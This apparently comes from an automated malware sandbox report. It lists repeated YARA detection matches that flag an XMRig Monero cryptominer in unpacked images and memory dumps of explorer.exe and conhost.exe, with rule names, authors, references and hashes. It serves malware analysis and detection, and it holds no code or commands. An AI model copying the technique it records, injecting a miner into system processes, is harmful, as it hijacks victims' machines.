                  Source: 28.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 27.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 28.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 28.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 27.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.2.explorer.exe.140000000.0.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.2.explorer.exe.140000000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 27.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 27.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 28.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 28.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 21.2.conhost.exe.224e882d2d0.7.raw.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 21.2.conhost.exe.224e882d2d0.7.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 21.2.conhost.exe.224e882d2d0.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 28.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 17.2.conhost.exe.20190d5ca00.10.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 17.2.conhost.exe.20190d5ca00.10.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 28.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 17.2.conhost.exe.2019125ca38.11.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 17.2.conhost.exe.2019125ca38.11.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001C.00000000.798724965.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001C.00000000.798724965.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001B.00000000.792450012.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001B.00000000.792450012.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001C.00000000.784200823.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001C.00000000.784200823.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 00000011.00000002.833907322.000002019125C000.00000004.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001C.00000000.796296289.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001C.00000000.796296289.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001B.00000002.925771817.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001B.00000002.925771817.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001C.00000000.780903437.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001C.00000000.780903437.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001C.00000000.774089554.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001C.00000000.774089554.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001B.00000000.775205927.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001B.00000000.775205927.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001C.00000000.816102106.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001C.00000000.816102106.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001B.00000000.781428125.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001B.00000000.781428125.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001C.00000000.810219805.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001C.00000000.810219805.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001B.00000000.795242519.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001B.00000000.795242519.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 00000015.00000002.812013124.00000224E7AD9000.00000004.00000001.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
                  Source: 00000015.00000002.812013124.00000224E7AD9000.00000004.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001C.00000000.793171664.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001C.00000000.793171664.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 00000015.00000002.821696567.00000224E8D2D000.00000004.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
